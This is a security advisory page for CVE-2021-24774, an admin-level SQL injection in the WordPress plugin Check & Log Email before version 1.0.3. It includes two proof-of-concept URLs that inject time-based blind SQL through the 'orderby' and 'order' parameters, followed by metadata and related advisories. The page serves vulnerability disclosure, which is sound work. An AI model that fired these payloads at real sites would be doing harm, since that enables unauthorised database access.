Check & Log Email < 1.0.3 – Admin+ SQL Injections | CVE 2021-24774 | Plugin Vulnerabilities

Description

The plugin does not validate and escape the "order" and "orderby" GET parameters before using them in a SQL statement when viewing logs, leading to SQL injections issues

Proof of Concept

With the 'Enable Log' settings (of the plugin) activated:
- https://example.com/wp-admin/admin.php?page=check-email-logs&orderby=sent_date+AND+(SELECT+4702+FROM (SELECT(SLEEP(5)))xwDN)&order=DESC
- https://example.com/wp-admin/admin.php?page=check-email-logs&orderby=sent_date&order=+AND+(SELECT+4702+FROM (SELECT(SLEEP(5)))xwDN)

Affects Plugins

Fixed in 1.0.3

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

bl4derunner

Submitter

Anton Sarsadskikh

Verified

Yes

WPVDB ID

f80ef09a-d3e2-4d62-8532-f0ebe59ae110

Timeline

Publicly Published

2021-09-27 (about 4 years ago)

Added

2021-09-27 (about 4 years ago)

Last Updated

2022-04-14 (about 3 years ago)

Other

Published

Title

Published

2014-08-01

Title

Social Slider < 6.0.0 - social-slider-2/ajax.php rA Parameter SQL Injection

Published

2024-12-11

Title

SeedProd Pro < 6.18.13 - Authenticated (Administrator+) SQL Injection

Published

2021-04-26

Title

Goto < 2.1 - Unauthenticated Blind SQL Injection

Published

2024-03-26

Title

Slider by Supsystic < 1.8.11 - Authenticated (Admin+) SQL Injection

Published

2024-08-28

Title

Spiffy Calendar < 4.9.13 - Authenticated (Admin+) SQL Injection